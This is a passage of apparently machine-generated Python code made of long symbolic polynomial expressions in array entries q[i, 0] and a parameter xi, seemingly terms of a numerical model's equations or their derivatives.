0] - 12641.975308642*q[1, 0]**2 + 12641.975308642*q[1, 0]*q[2, 0] - 12641.975308642*q[2, 0]**2 + 26.6666666666667) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-8017597.91579545*q[0, 0] + 4008798.95789773*q[1, 0] + 4008798.95789773*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-337119.341563786*q[0, 0] + 168559.670781893*q[1, 0] + 168559.670781893*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12828156665.2727*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 2004399.47894886*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + (31963907.9408627*q[0, 0] - 15981953.9704313*q[1, 0] - 15981953.9704313*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (51312626661.0909*q[0, 0] - 25656313330.5455*q[1, 0] - 25656313330.5455*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1422.22222222222*q[0, 0] - 711.111111111111*q[1, 0] - 711.111111111111*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) - 4.44444444444444*q[0, 0] + 8.88888888888889*q[1, 0] + 8.88888888888889*q[2, 0] + 2.0, -160351958.315909*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-1053.49794238683*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0] - 474.074074074074)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-2405279374.73864*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 898984.910836762*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] - q[1, 0] + 2*q[2, 0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) + 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*q[0, 0]**2 + 12641.975308642*q[0, 0]*q[1, 0] + 12641.975308642*q[0, 0]*q[2, 0] - 12641.975308642*q[1, 0]**2 + 12641.975308642*q[1, 0]*q[2, 0] - 12641.975308642*q[2, 0]**2 + 26.6666666666667) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-8017597.91579545*q[0, 0] + 4008798.95789773*q[1, 0] + 4008798.95789773*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-337119.341563786*q[0, 0] + 168559.670781893*q[1, 0] + 168559.670781893*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12828156665.2727*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 2004399.47894886*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + (31963907.9408627*q[0, 0] - 15981953.9704313*q[1, 0] - 15981953.9704313*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (51312626661.0909*q[0, 0] - 25656313330.5455*q[1, 0] - 25656313330.5455*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1422.22222222222*q[0, 0] - 711.111111111111*q[1, 0] - 711.111111111111*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) - 4.44444444444444*q[0, 0] + 8.88888888888889*q[1, 0] + 8.88888888888889*q[2, 0] + 2.0, (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 